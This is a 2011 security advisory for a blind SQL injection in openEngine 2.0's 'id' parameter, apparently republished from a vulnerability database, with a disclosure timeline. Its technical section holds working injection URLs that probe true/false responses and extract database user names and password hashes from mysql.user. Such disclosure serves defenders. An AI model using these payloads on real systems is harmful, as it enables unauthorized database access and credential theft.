openEngine 2.0 'id' Blind SQL Injection vulnerability

2011-10-0100:00:00

vulners.com

Advisory: openEngine 2.0 'id' Blind SQL Injection vulnerability
Advisory ID: SSCHADV2011-019
Author: Stefan Schurtz
Affected Software: Successfully tested on openEngine 2.0 100226
Vendor URL: http://www.openengine.de/
Vendor Status: informed
CVE-ID: -

==========================
Vulnerability Description:

openEngine 2.0 is prone to a Blind SQL Injection

==================
Technical Details:

Database information

User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)

Blind SQL Injection

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('a'='a&key= <- error
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('a'='a&key= <- no error

User-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a <- error (e)

Password(Hash)-Guessing

http://<target>/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND ('a'='a <- error (*)

=========
Solution:

====================
Disclosure Timeline:

25-Sep-2011 - informed developers
26-Sep-2011 – release date of this security advisory

========
Credits:

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:

http://www.openengine.de/
http://www.rul3z.de/advisories/SSCHADV2011-019.txt

JSON

openEngine 2.0 &#39;id&#39; Blind SQL Injection vulnerability

========================== Vulnerability Description:

================== Technical Details:

========= Solution:

==================== Disclosure Timeline:

======== Credits:

=========== References: